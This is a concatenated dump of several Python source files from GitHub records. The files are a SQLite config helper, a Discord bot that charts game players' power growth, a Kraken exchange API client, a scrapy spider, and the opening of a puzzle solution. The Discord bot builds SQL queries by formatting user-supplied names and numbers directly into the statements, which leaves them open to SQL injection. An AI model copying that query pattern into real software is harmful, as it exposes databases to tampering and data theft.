sqlite3.connect(DATABASE)\n return db\n\n# Function for sql UPDATE statement string building\ndef sql_stat_build(str1,str2,cont,listM,valueSP): \n # If value is resolution do not convert to int\n if str2 == \"RESOLUTION=?\":\n listM.append(valueSP)\n else: \n listM.append(int(valueSP))\n\n if cont == 0:\n str1 += str2\n else:\n str1 += \",\" + str2\n\n return str1\n\ndef set_sp_config(app,**spectro_pointer_config):\n with app.app_context():\n conn = connect_db()\n # Aux variable for value control\n value_control = 0\n # Create string where SQL statements will be added\n string_sql = \"UPDATE sp_config SET \"\n # Create empty list where values to update will be appended\n l_sp_config = []\n\n configuration_mapping = {\n 'use_raspberry' : 'USE_RASPBERRY',\n 'correct_vertical_camera' : 'CORRECT_VERTICAL_CAMERA',\n 'correct_horizontal_camera' : 'CORRECT_HORIZONTAL_CAMERA',\n 'center_radius' : 'CENTER_RADIUS',\n 'show_center_circle' : 'SHOW_CENTER_CIRCLE',\n 'enable_photo' : 'ENABLE_PHOTO',\n 'enable_video' : 'ENABLE_VIDEO',\n 'record_seconds' : 'RECORD_SECONDS',\n 'threshold' : 'THRESHOLD',\n 'resolution' : 'RESOLUTION',\n 'framerate' : 'FRAMERATE',\n 'sensor_mode' : 'SENSOR_MODE',\n 'shutter_speed' : 'SHUTTER_SPEED',\n 'iso' : 'ISO'\n }\n\n for variable in configuration_mapping.keys():\n if spectro_pointer_config[variable]:\n config_str = f\"{configuration_mapping[variable]}=?\"\n string_sql = sql_stat_build(string_sql, config_str, value_control, l_sp_config, spectro_pointer_config[variable])\n value_control+=1\n\n # Convert list into tuple\n l_sp_config = tuple(l_sp_config)\n \n # Execute UPDATE statement\n conn.execute(string_sql,l_sp_config)\n\n conn.commit()\n conn.close()\n\ndef get_sp_config(param,app):\n with app.app_context():\n g.db = connect_db()\n config_table = g.db.execute('select '+param+' from sp_config')\n result = 0\n try:\n result = config_table.fetchall()[0][0]\n except:\n result = 0\n\n g.db.close()\n return result\n","repo_name":"spectro-pointer/colimador-dinamico","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1305800285","text":"#!/usr/bin/env python3\n#\n# FILENAME: plotty-bot.py\n# CREATED: August 17, 2019\n# AUTHOR: buerge3\n#\n# A discord bot for plotting player and alliance growth\n# Usage: python3 ./plotty-bot.py\nimport discord\nfrom discord.ext import commands\nfrom discord import Status\n#from discord.ext.commands import Bot\n\nimport sqlite3\nfrom sqlite3 import Error\n\nimport logging\n\nimport time\nimport datetime\nfrom datetime import timedelta\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport matplotlib.ticker as tkr\nfrom dateutil import parser\nfrom matplotlib import style\n\n# MODIFIABLE PARAMETERS\ndb_name = \"LVE.db\"\ntoken_file = \"secret_plotty.txt\"\nimg_save_name = \"latest-plotty.png\"\nBOT_PREFIX = (\"!\",\"?\")\nbot = commands.Bot(command_prefix=BOT_PREFIX)\n\n# -----------------------------------------------------------------------------\n# DATABASE CONNECTION SCRIPT\n# -----------------------------------------------------------------------------\ndef create_connection(db_file):\n \"\"\" create a database connection to the SQLite database\n specified by the db_file\n :param db_file: database file\n :return: Connection object or None\n \"\"\"\n try:\n conn = sqlite3.connect(db_file)\n logging.info(\"connected to \" + db_file)\n return conn\n except Error as e:\n
logging.error(e, exc_info=True)\n \n return None\n\n\nconn = create_connection(db_name)\n\n\n# -----------------------------------------------------------------------------\n# FUNCTIONS\n# -----------------------------------------------------------------------------\n# init_logger\n# initialize the logger to output msgs of lv INFO or higher to the console,\n# and write messages of DEBUG or higher to a log file\ndef init_logger():\n logfile_name = datetime.datetime.now().strftime(\"%d-%m-%Y_%I-%M-%S_%p\")\n #logging.basicConfig(filename='logs/'+logfile_name, filemode='w', format='[%(asctime)s] %(levelname)s: %(message)s')\n logFormatter = logging.Formatter('[%(asctime)s] %(levelname)s: %(message)s')\n rootLogger = logging.getLogger()\n rootLogger.setLevel(logging.DEBUG)\n fileHandler = logging.FileHandler(\"{}/{}.log\".format('logs', logfile_name))\n fileHandler.setFormatter(logFormatter)\n fileHandler.setLevel(logging.DEBUG)\n rootLogger.addHandler(fileHandler)\n consoleHandler = logging.StreamHandler()\n consoleHandler.setFormatter(logFormatter)\n consoleHandler.setLevel(logging.WARNING)\n rootLogger.addHandler(consoleHandler)\n\n\n# -----------------------------------------------------------------------------\n# DISCORD BOT COMMANDS & EVENTS\n# -----------------------------------------------------------------------------\n@bot.command(brief=\"Plot the growth of a player\", description=\"Plot the growth of a single player. To compare the growth of different players, use the \\\"players\\\" command\", aliases=[\"plot\", \"plot-one\"])\nasync def player(ctx, ppl : str):\n cur = conn.cursor()\n\n sql = '''SELECT key FROM alias WHERE name=\"{}\"'''.format(ppl.lower())\n logging.debug(\"SQL: \" + sql)\n cur.execute(sql)\n res = cur.fetchone()\n key = -1\n if res is None or len(res) == 0:\n msg = \"**[WARNING]** The player \" + ppl + \" does not exist. 
Please check your spelling and try again.\"\n logging.warning(msg)\n await ctx.send(msg)\n return\n else:\n key = res[0]\n #cur.execute(\"SELECT * FROM test1 WHERE Name=?\", str(ppl))\n sql1 = '''SELECT Date, Lv, Power FROM LVE WHERE PlayerKey=\"{}\" ORDER BY ROWID DESC LIMIT 1'''.format(str(key))\n logging.debug(\"SQL: \" + sql1)\n cur.execute(sql1)\n\n value_list = cur.fetchone()\n if value_list is None or len(value_list) == 0:\n msg = \"**[WARNING]** The player \" + ppl + \" does not have any data.\"\n logging.warning(msg)\n await ctx.send(msg)\n return\n\n sql2 = '''SELECT name FROM display WHERE key=\"{}\" ORDER BY ROWID DESC LIMIT 1'''.format(str(key))\n logging.debug(\"SQL: \" + sql2)\n cur.execute(sql2)\n default_name = cur.fetchone()\n\n title = ppl;\n alias_list = [];\n if default_name is not None:\n if (default_name[0].lower() == ppl.lower()):\n title = default_name[0];\n else:\n alias_list.append(default_name[0].lower())\n\n sql3 = '''SELECT name FROM alias WHERE key=\"{}\" ORDER BY ROWID DESC'''.format(str(key))\n logging.debug(\"SQL: \" + sql3)\n cur.execute(sql3)\n list_o_names = cur.fetchall()\n if list_o_names is not None:\n if (list_o_names[0][0].lower() != title.lower() and list_o_names[0][0] not in alias_list):\n alias_list.append(list_o_names[0][0])\n if (list_o_names[-1][0].lower() != title.lower() and list_o_names[-1][0] not in alias_list):\n alias_list.append(list_o_names[-1][0])\n if (len(list_o_names) > 2 and list_o_names[-2][0].lower() != title.lower() and list_o_names[-2][0] not in alias_list):\n alias_list.append(list_o_names[-2][0])\n alias_string = \", \".join(alias_list)\n if (len(list_o_names) > 4):\n alias_string += \"... (+%s more)\" % (len(list_o_names) - len(alias_list) - 1)\n #else:\n #print(\"list_o_names is %d long\" % len(list_o_names))\n if (len(alias_list) > 0):\n alias_string = \"\\n Also known as: \" + alias_string\n\n #msg = ''.join(str(v) for v in value_list)\n #msg = \"The power of \" + ppl + \" is \" + msg;\n msg = \"**%s**\\n Last Updated: %s\\n Lv: %s\\n Power: %s\" % (title, value_list[0], value_list[1], '{:,}'.format(value_list[2]))\n\n # get growth rates:\n sql4 = '''SELECT Lv, Power, Date FROM LVE WHERE PlayerKey=\"{}\" AND Date>\"{}\" ORDER BY DATE DESC'''.format(str(key), datetime.datetime.now() - datetime.timedelta(days=8))\n logging.debug('SQL: ' + sql4)\n cur.execute(sql4)\n result = cur.fetchall()\n if result is not None and len(result) > 3:\n num_entries = len(result)\n power_change = result[0][1] - result[-1][1]\n growth_per_day = float(power_change) / num_entries\n growth_per_week = growth_per_day * 7\n percent_growth_per_week = growth_per_week / result[-1][1]\n msg += \"\\n Growth: %s (%s) per week\" % (human_format(growth_per_week), '{:.2%}'.format(percent_growth_per_week))\n\n msg += alias_string;\n\n # get lve fam birthday\n sql5 = '''\n SELECT Date, Lv\n FROM [LVE] A\n INNER JOIN\n (\n SELECT Alliance, MIN(Date) AS minDate\n FROM [LVE]\n GROUP BY Alliance\n ) B ON A.Alliance = B.Alliance\n INNER JOIN\n (\n SELECT PlayerKey, MIN(Date) AS minDate\n FROM [LVE]\n GROUP BY PlayerKey\n ) C ON\n A.PlayerKey=\"{}\" AND\n A.PlayerKey = C.PlayerKey AND\n julianday(B.minDate, '+2 days') < julianday(C.minDate) AND\n A.Date = C.minDate\n '''.format(str(key))\n logging.debug(\"SQL: \" + sql5)\n cur.execute(sql5)\n birthday = cur.fetchone()\n if (birthday is not None):\n msg += \"\\n LVE Birthday: joined on %s when lv %d\" % (birthday[0], birthday[1])\n\n\n\n logging.info(msg)\n\n\n dates = []\n values = []\n\n sql = '''SELECT Date, Lv, 
Power FROM LVE WHERE PlayerKey=\"{}\" AND julianday(Date, '+1 month') > julianday('now', 'localtime') '''.format(str(key))\n logging.debug(\"SQL: \" + sql)\n cur.execute(sql)\n\n value_list = cur.fetchall()\n\n for row in value_list:\n dates.append(parser.parse(row[0]))\n values.append(row[2])\n\n async with ctx.message.channel.typing():\n fig = plt.figure()\n plt.style.use('dark_background')\n ax = fig.add_subplot(111)\n line, = ax.plot(dates, values, lw=2)\n fig.autofmt_xdate()\n ax.set_title(\"Growth of \" + ppl + \" for this Month\")\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Power\")\n ax.get_yaxis().set_major_formatter(\n tkr.FuncFormatter(lambda x, p: format(int(x), ',')))\n plt.savefig(img_save_name, bbox_inches=\"tight\")\n plt.close()\n\n await ctx.send(msg, file=discord.File(img_save_name))\n\n@bot.command(brief=\"Plot the growth of multiple players\", description=\"Plot the growth of the specified players on a single graph\", aliases=[\"players\", \"plot-many\", \"plot-several\", \"plot-multiple\", \"plot-players\"])\nasync def compare(ctx, *argv):\n args = [];\n for arg in argv:\n args.append(arg)\n\n cur = conn.cursor()\n\n async with ctx.message.channel.typing():\n fig = plt.figure()\n plt.style.use('dark_background')\n ax = fig.add_subplot(111)\n for i in range(len(argv)):\n ppl = argv[i]\n key = -1\n sql = '''SELECT key FROM alias WHERE name=\"{}\"'''.format(ppl.lower())\n logging.debug(\"SQL: \" + sql)\n cur.execute(sql)\n res = cur.fetchone()\n if res is None:\n msg = \"**[WARNING]** The player \" + ppl + \" does not exist. Please check your spelling and try again.\"\n logging.warning(msg)\n await ctx.send(msg)\n continue\n else:\n key = res[0]\n sql = '''SELECT Date, Lv, Power FROM LVE WHERE PlayerKey=\"{}\" AND julianday(Date, '+1 month') > julianday('now', 'localtime')'''.format(str(key))\n logging.debug(\"SQL: \" + sql)\n cur.execute(sql)\n value_list = cur.fetchall()\n dates = []\n values = []\n for row in value_list:\n dates.append(parser.parse(row[0]))\n values.append(row[2])\n line, = ax.plot(dates, values, lw=2, label=argv[i])\n\n fig.autofmt_xdate()\n ax.set_title(\"Power of \" + str(len(argv)) + \" Players this Month\")\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Power\")\n ax.get_yaxis().set_major_formatter(\n tkr.FuncFormatter(lambda x, p: format(int(x), ',')))\n plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n plt.savefig(img_save_name, bbox_inches=\"tight\")\n plt.close()\n\n await ctx.send(file=discord.File(img_save_name))\n\n'''\n@bot.command(description=\"Plot the growth of a single alliance. 
To compare the growth of different alliances, use the \\\"alliances\\\" command\")\nasync def alliance(ctx, name):\n cur = conn.cursor()\n #cur.execute(\"SELECT * FROM test1 WHERE Name=?\", str(ppl))\n cmd = \"SELECT Date, count(*), SUM(Power) FROM LVE WHERE alliance=\" + name + \" GROUP BY Date ORDER BY Date DESC LIMIT 1\"\n cur.execute(cmd)\n\n value_list = cur.fetchone()\n #msg = ''.join(str(v) for v in value_list)\n #msg = \"The power of \" + ppl + \" is \" + msg;\n msg = \"**\" + name + \"**\\n Last Updated: %s\\n Number of Players: %s\\n Total Power: %sk\" % value_list \n logging.info(msg);\n\n dates = []\n values = []\n\n cmd = \"SELECT Date, SUM(Power) FROM LVE WHERE alliance=\" + name + \" GROUP BY Date ORDER BY Date\"\n cur.execute(cmd)\n\n value_list = cur.fetchall()\n\n for row in value_list:\n dates.append(parser.parse(row[0]))\n values.append(row[1])\n\n\n fig = plt.figure()\n plt.style.use('dark_background')\n ax = fig.add_subplot(111)\n line, = ax.plot(dates, values, lw=2)\n fig.autofmt_xdate()\n ax.set_title(\"Power of \" + name)\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Power (in thousands)\")\n plt.savefig('latest.png', bbox_inches=\"tight\")\n plt.close()\n\n await ctx.send(content=msg, file=discord.File(img_save_name))\n\n@bot.command(description=\"Plot the growth of multiple alliances in one chart\")\nasync def alliances(*argv):\n args = [];\n for arg in argv:\n args.append(arg)\n\n cur = conn.cursor()\n\n fig = plt.figure()\n plt.style.use('dark_background')\n ax = fig.add_subplot(111)\n for i in range(len(argv)):\n cur.execute(\"SELECT Date, SUM(Power) FROM LVE WHERE alliance=\" + argv[i] + \" GROUP BY Date ORDER BY Date\")\n value_list = cur.fetchall()\n dates = []\n values = []\n for row in value_list:\n dates.append(parser.parse(row[0]))\n values.append(row[1])\n line, = ax.plot(dates, values, lw=2, label=argv[i])\n\n fig.autofmt_xdate()\n ax.set_title(\"Power of \" + str(len(argv)) + \" Alliances\")\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Power (in thousands)\")\n plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n plt.savefig('latest.png', bbox_inches=\"tight\")\n plt.close()\n\n await ctx.send(file=discord.File(img_save_name))\n'''\n@bot.command(brief=\"Plot the growth of all players in an alliance\", description=\"Plot the growth of all players in an alliance within an optionally specified level range on a single graph\", aliases=[\"plot-alliance\", \"plot-all\"])\nasync def alliance(ctx, team : str, min=1, max=40):\n\n cur = conn.cursor()\n\n sql = '''SELECT PlayerKey FROM LVE WHERE Alliance=\"{}\" AND Date>date(\"now\",\"-2 days\") AND Lv>=\"{}\" AND Lv <=\"{}\" GROUP BY PlayerKey ORDER BY Power DESC'''.format(team.lower(), str(min), str(max))\n logging.debug('SQL: ' + sql)\n cur.execute(sql)\n query_res = cur.fetchall()\n\n if query_res is None or len(query_res) == 0:\n msg = \"**[WARNING]** No results found for team {}\".format(team)\n logging.warning(msg)\n await ctx.send(msg)\n return\n\n async with ctx.message.channel.typing():\n fig = plt.figure()\n plt.style.use('dark_background')\n ax = fig.add_subplot(111)\n for key in query_res:\n sql3 = '''SELECT name FROM display WHERE key=\"{}\" ORDER BY ROWID DESC LIMIT 1'''.format(key[0])\n logging.debug('SQL: ' + sql3)\n cur.execute(sql3)\n get_name = cur.fetchone()\n\n if not get_name:\n sql3 = '''SELECT Name FROM alias WHERE key=\"{}\" ORDER BY ROWID DESC LIMIT 1'''.format(key[0])\n logging.debug('SQL: ' + sql3)\n cur.execute(sql3)\n get_name = cur.fetchone()\n sql = '''SELECT Date, Lv, 
Power FROM LVE WHERE PlayerKey=\"{}\" AND julianday(Date, '+1 month') > julianday('now', 'localtime')'''.format(str(key[0]))\n logging.debug(\"SQL: \" + sql)\n cur.execute(sql)\n value_list = cur.fetchall()\n dates = []\n values = []\n for row in value_list:\n dates.append(parser.parse(row[0]))\n values.append(row[2])\n line, = ax.plot(dates, values, lw=2, label=get_name[0])\n\n fig.autofmt_xdate()\n ax.set_title(\"Power of \" + str(len(query_res)) + \" Players this Month\")\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Power\")\n ax.get_yaxis().set_major_formatter(\n tkr.FuncFormatter(lambda x, p: format(int(x), ',')))\n plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n plt.savefig(img_save_name, bbox_inches=\"tight\")\n plt.close()\n\n await ctx.send(file=discord.File(img_save_name))\n\ndef human_format(num):\n magnitude = 0\n while abs(num) >= 1000:\n magnitude += 1\n num /= 1000.0\n # add more suffixes if you need them\n return '%.2f%s' % (num, ['', 'k', 'M', 'G', 'T', 'P'][magnitude])\n\n@bot.command(brief=\"Assign a display name\", description=\"Designate the case-sensitive display name of a player\", aliases=[\"make-default\", \"set-default\", \"make-name\", \"set-name\", \"make-display\", \"set-display\"])\nasync def name(ctx, name : str):\n cur = conn.cursor()\n sql = '''SELECT key FROM alias WHERE name=\"{}\" ORDER BY ROWID DESC LIMIT 1'''.format(name.lower())\n logging.debug('SQL: ' + sql)\n cur.execute(sql)\n key = cur.fetchone()\n\n if not key:\n msg = \"**[ERROR]** The name {} does not exist. Try adding it first by doing !add\".format(name)\n logging.error(msg)\n await ctx.send(msg)\n return\n\n sql = '''DELETE FROM display WHERE key=\"{}\"'''.format(key[0])\n logging.debug('SQL: ' + sql)\n cur.execute(sql)\n\n sql = '''INSERT INTO display (key, name) VALUES (\"{}\", \"{}\")'''.format(key[0], name)\n logging.debug('SQL: ' + sql)\n cur.execute(sql)\n\n conn.commit()\n\n msg = 'Set \\'' + name + '\\' as the player display name'\n logging.info(msg)\n await ctx.send(msg)\n\n\n@bot.command(brief=\"Display the roster\", description=\"Display the roster with active/inactive status for the given team\")\nasync def roster(ctx, team : str, options='-g'):\n '''\n COMMAND OPTIONS:\n -n or -a = sort my name/alphabetically\n -p = sort by power\n -g = sort by growth\n '''\n num_insufficient = 0;\n num_active = 0;\n num_inactive = 0;\n total_growth = 0;\n total_percent_growth = 0;\n roster_msg = \"\";\n cur = conn.cursor()\n\n\n sql = '''SELECT PlayerKey FROM LVE WHERE Alliance=\"{}\" AND Date>date(\"now\",\"-2 days\") GROUP BY PlayerKey'''.format(team.lower())\n '''if options == \"-n\" or options == \"-a\":\n # DON'T KNOW HOW TO IMPLEMENT THIS YET\n elif (options == \"-p\"):\n sql += \" ORDER BY Power DESC\"\n elif (options == \"-g\"):\n # NOT SURE KNOW HOW TO IMPLEMENT THIS YET'''\n sql += \" ORDER BY Power DESC\"\n logging.debug('SQL: ' + sql)\n cur.execute(sql)\n query_res = cur.fetchall()\n\n async with ctx.message.channel.typing():\n\n for key in query_res:\n sql2 = '''\n SELECT Power, Date\n FROM [LVE] A\n WHERE PlayerKey=\"{}\"\n AND Power NOT IN (\n SELECT Power\n FROM (\n SELECT MAX(Date) AS max, Power\n FROM [LVE] B\n WHERE B.PlayerKey = A.PlayerKey\n )\n )\n ORDER BY Date DESC\n LIMIT 1\n '''.format(key[0])\n logging.debug('SQL: ' + sql2)\n cur.execute(sql2)\n recent = cur.fetchone()\n\n sql3 = '''SELECT name FROM display WHERE key=\"{}\" ORDER BY ROWID DESC LIMIT 1'''.format(key[0])\n logging.debug('SQL: ' + sql3)\n cur.execute(sql3)\n get_name = cur.fetchone()\n\n 
if not get_name:\n sql3 = '''SELECT Name FROM alias WHERE key=\"{}\" ORDER BY ROWID DESC LIMIT 1'''.format(key[0])\n logging.debug('SQL: ' + sql3)\n cur.execute(sql3)\n get_name = cur.fetchone()\n\n sql4 = '''SELECT Lv, Power, Date FROM LVE WHERE PlayerKey=\"{}\" AND Date>\"{}\" ORDER BY DATE DESC'''.format(key[0], datetime.datetime.now() - datetime.timedelta(days=8))\n logging.debug('SQL: ' + sql4)\n cur.execute(sql4)\n result = cur.fetchall()\n\n num_entries = len(result)\n\n if num_entries < 3:\n # Case insufficent data\n msg = \"```🆕 Name: {:25}| Level: {:<3}| Power: {:<8}| Insufficient data, only {} entries this week ```\".format( get_name[0] , result[0][0], human_format(result[0][1]), num_entries)\n num_insufficient += 1\n\n elif recent and ( datetime.datetime.strptime(recent[1], \"%Y-%m-%d\") + datetime.timedelta(days=14) ) >= datetime.datetime.now() :\n # Case active\n power_change = result[0][1] - result[-1][1]\n growth_per_day = float(power_change) / num_entries\n growth_per_week = growth_per_day * 7\n #percent_growth_per_day = growth_per_day / recent[0];\n percent_growth_per_week = growth_per_week / result[-1][1]\n\n msg = \"```🌿 Name: {0:<25}| Level: {1:<3}| Power: {2:<8}| Active, growing {3} ({4:.2%}) per week ```\".format( get_name[0] , result[0][0], human_format(result[0][1]), human_format(growth_per_week), percent_growth_per_week)\n num_active += 1\n total_growth += growth_per_week\n total_percent_growth += percent_growth_per_week\n\n else :\n # Case inactive\n last_seen = \"\"\n if (recent):\n last_seen = recent[1]\n else:\n last_seen = \"never\"\n msg = \"```🕒 Name: {:<25}| Level: {:<3}| Power: {:<8}| Inactive, last seen {} ```\".format( get_name[0], result[0][0], human_format(result[0][1]), last_seen)\n num_inactive += 1\n\n #roster_msg += msg + \"\\n\"\n logging.info(msg)\n await ctx.send(msg)\n\n num_players = num_active + num_inactive + num_insufficient\n if num_players == 0:\n msg = \"No data has been uploaded for team {} today\".format(team)\n logging.info(msg)\n await ctx.send(msg)\n return\n #overview_msg = \"active players {} out of {}\\n\".format(num_active + num_insufficient, num_players)\n #overview_msg += \"the average member grows {0} ({1:.2f}%) per week\\n\".format(human_format(total_growth/num_players), total_percent_growth/num_players)\n #overview_msg += \"the average active member grows {} ({}%} per week\".format(total_growth/num_players, total_percent_growth/num_players)\n embed=discord.Embed(title=\"Team {} Summary\".format(team.upper()), color=0x00ff00)\n #embed.add_field(name=\"OVERVIEW\", value=overview_msg, inline=False)\n #embed.add_field(name=\"ROSTER ({}):\".format(num_players), value=roster_msg, inline=False)\n embed.add_field(name=\"Player Count ({})\".format(num_players), value='''{} Active, {} Inactive, {} New'''.format(num_active, num_inactive, num_insufficient), inline=False)\n embed.add_field(name=\"Weekly Growth\", value='''{0} ({1:.2f}%) per Player'''.format(human_format(total_growth/num_players), total_percent_growth/num_players), inline=False)\n await ctx.send(\"Done.\", embed=embed)\n\n\n\n@bot.event\nasync def on_ready():\n logging.info(\"Logged in as \" + bot.user.name)\n\n@bot.event\nasync def on_command_error(ctx, error):\n msg = \"**[ERROR]** %s\" % (error)\n logging.error(msg)\n await ctx.send(msg)\n raise\n\n# ------------------------------------------------------------------------------\n# MAIN SCRIPT\n# ------------------------------------------------------------------------------\ninit_logger()\nstyle.use 
('fivethirtyeight')\nf = open(token_file, \"r\")\nTOKEN = f.read()\nbot.run(TOKEN)\n","repo_name":"buerge3/STFC_Sqlite_Discord_Bot","sub_path":"plotty-bot.py","file_name":"plotty-bot.py","file_ext":"py","file_size_in_byte":22195,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"36121978015","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport hmac\nimport json\nimport requests\n\nfrom time import time_ns\nfrom hashlib import sha256, sha512\nfrom urllib.parse import urlencode\nfrom base64 import b64encode, b64decode\n\nfrom slay_the_kraken.kraken.exceptions import KrakenError\n\n\nclass API(object):\n \"\"\"Represents an instance that communicates with the kraken exchange.\"\"\"\n # Private:\n _api_key: str = ''\n _api_secret: str = ''\n _api_version: str = '0'\n _timeout: float = 5.0\n _json_options: dict = {}\n\n # Public:\n api_url: str = 'https://api.kraken.com'\n session: requests.Session = requests.Session()\n response: requests.Response = requests.Response()\n\n def __init__(self) -> None:\n self._load_keys()\n\n def _load_keys(self) -> None:\n \"\"\"Load keys from the env directory into memory.\"\"\"\n with open('slay_the_kraken/env/api_keys.json', 'r') as myfile:\n api_keys_data = json.load(myfile)\n self._api_key: str = api_keys_data['KRAKEN_API_KEY']\n self._api_secret: str = api_keys_data['KRAKEN_API_SECRET']\n\n def _nonce(self) -> int:\n \"\"\"An ever-increasing value used as a unique identifier.\"\"\"\n return int(time_ns())\n\n def _query(self, url: str, headers: dict, data: dict, timeout: float) -> dict:\n \"\"\"Wrapper around a simple request.\"\"\"\n url: str = self.api_url + url\n self.response = self.session.post(url, headers=headers, data=data, timeout=timeout)\n if self.response.status_code not in (200, 201, 202):\n self.response.raise_for_status()\n response_json = self.response.json(**self._json_options)\n kraken_api_error = response_json['error']\n if kraken_api_error:\n raise KrakenError(kraken_api_error)\n return response_json\n\n def _signature(self, url_path: str, data: dict) -> str:\n \"\"\"Sign and hash the given data.\"\"\"\n nonce = str(data['nonce'])\n data_encoded = urlencode(data)\n # Unicode-objects must be encoded before hashing\n encoded = (nonce + data_encoded).encode()\n message = url_path.encode() + sha256(encoded).digest()\n signature = hmac.new(b64decode(self._api_secret), message, sha512)\n sigdigest = b64encode(signature.digest())\n return sigdigest.decode()\n\n def close(self):\n \"\"\"Close the connection to the exchange.\"\"\"\n self.session.close()\n\n def public_query(self, method: str, data: dict) -> dict:\n \"\"\"Query without having to sign.\"\"\"\n url: str = '/' + self._api_version + '/public/' + method\n return self._query(url, headers={}, data=data, timeout=self._timeout)\n\n def private_query(self, method: str, data: dict) -> dict:\n \"\"\"Query with having to sign.\"\"\"\n url: str = '/' + self._api_version + '/private/' + method\n data['nonce'] = self._nonce()\n headers: dict = {'API-Key': self._api_key, 'API-Sign': self._signature(url, data)}\n return self._query(url, headers=headers, data=data, timeout=self._timeout)\n\n def Balance(self) -> dict:\n \"\"\"Returns the account balance.\"\"\"\n result: dict = self.private_query('Balance', data={})\n return result\n\n def OHLC(self, pair: str, interval: int = 5) -> dict:\n \"\"\"Return the open-high-low-close data for a given asset.\"\"\"\n intervals: list[int] = [1, 5, 15, 30, 60, 4*60, 24*60, 7*24*60, 15*24*60] # in
minutes\n if interval not in intervals:\n interval = 1\n return self.public_query('OHLC', data={'pair': pair, 'interval': interval})\n","repo_name":"simonaertssen/SlayTheKraken","sub_path":"slay_the_kraken/kraken/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41788169805","text":"# -*- coding: utf-8 -*-#\nfrom __future__ import division, absolute_import, unicode_literals\n\nfrom .treehouse import TreeHouseProductsSpider\nfrom scrapy.http import Request\nimport urlparse\n\nfrom scrapy.log import INFO\nfrom product_ranking.items import SiteProductItem\nfrom product_ranking.utils import valid_url\n\n\nclass TreeHouseShelfPagesSpider(TreeHouseProductsSpider):\n name = 'treehouse_shelf_urls_products'\n allowed_domains = ['tree.house']\n\n def __init__(self, *args, **kwargs):\n kwargs.pop('quantity', None)\n self.num_pages = int(kwargs.pop('num_pages', 1))\n\n super(TreeHouseShelfPagesSpider, self).__init__(*args, **kwargs)\n\n def start_requests(self):\n yield Request(url=valid_url(self.product_url),\n meta={'search_term': '', 'remaining': self.quantity})\n\n def _scrape_product_links(self, response):\n links = response.xpath(\n '//div[contains(@class, \"product-grid-item\")]//a[@class=\"grid-image\"]/@href'\n ).extract()\n\n if links:\n for link in links:\n link = urlparse.urljoin(response.url, link)\n yield link, SiteProductItem()\n else:\n self.log(\"Found no product links in {url}\".format(url=response.url), INFO)\n\n def _scrape_next_results_page_link(self, response):\n return None","repo_name":"aprosdev/ecom-predictor","sub_path":"product-ranking/product_ranking/spiders/treehouse_shelf_pages.py","file_name":"treehouse_shelf_pages.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23392957191","text":"\r\ninputFile = 'input.txt'\r\ninputFile = 'C-small-attempt0.in'\r\noutputFile = 'output.txt'\r\n\r\nf = open(inputFile, 'rb')\r\ninputs = f.readlines()\r\nf.close()\r\n\r\ntotal = int(inputs[0])\r\ncount = 1\r\n \r\ni = 1\r\nresult = ''\r\n\r\ndef calc1(a):\r\n if a == 0:\r\n return 0\r\n if a == 1:\r\n return 3\r\n if a == 2:\r\n return 2\r\n return calc1(a-2)*2\r\ndef calc2(a):\r\n if a == 0 or a == 1:\r\n return 0\r\n if a == 2:\r\n return 1\r\n if a % 2 == 1:\r\n return calc2(a-2) + 2\r\n else:\r\n return calc2(a-2) + 1\r\ndef calc(a, b, intA):\r\n result = 0\r\n isEqual = False\r\n if a == 1:\r\n if intA >= 0:\r\n result +=1;\r\n isEqual = intA==0\r\n if intA >= 1:\r\n result +=1;\r\n isEqual = intA==1\r\n if intA >= 4:\r\n result +=1;\r\n isEqual = intA==4\r\n if intA >= 9:\r\n result +=1;\r\n isEqual = intA==9\r\n return (result, isEqual)\r\n \r\n if b==1:\r\n result = 4\r\n else:\r\n result = calc1(b)+calc1(b-1)+calc2(b)+calc2(b-1)\r\n cpA = ['0' for i in range(a)]\r\n i = int(a/2)\r\n j = 0\r\n subA = ['0','1','2']\r\n subB = ['0','1']\r\n \r\n if a % 2 == 1:\r\n while (j < i and i > 0):\r\n cpA[j] = '1'\r\n cpA[-j-1] = '1'\r\n for sub in subA:\r\n cpA[i] = sub\r\n if int(''.join(cpA)) * int(''.join(cpA)) <= intA:\r\n isEqual = intA==int(''.join(cpA)) * int(''.join(cpA))\r\n result += 1\r\n else:\r\n \r\n return (result, isEqual)\r\n j+=1\r\n if a % 2 == 0:\r\n while((j==0 or j < i-1) and i > 0):\r\n \r\n cpA[j] = '1'\r\n cpA[-j-1] = '1'\r\n for sub in subB:\r\n cpA[i] = sub\r\n cpA[i-1] = sub\r\n if i-1 == j and sub == '0':\r\n continue\r\n if 
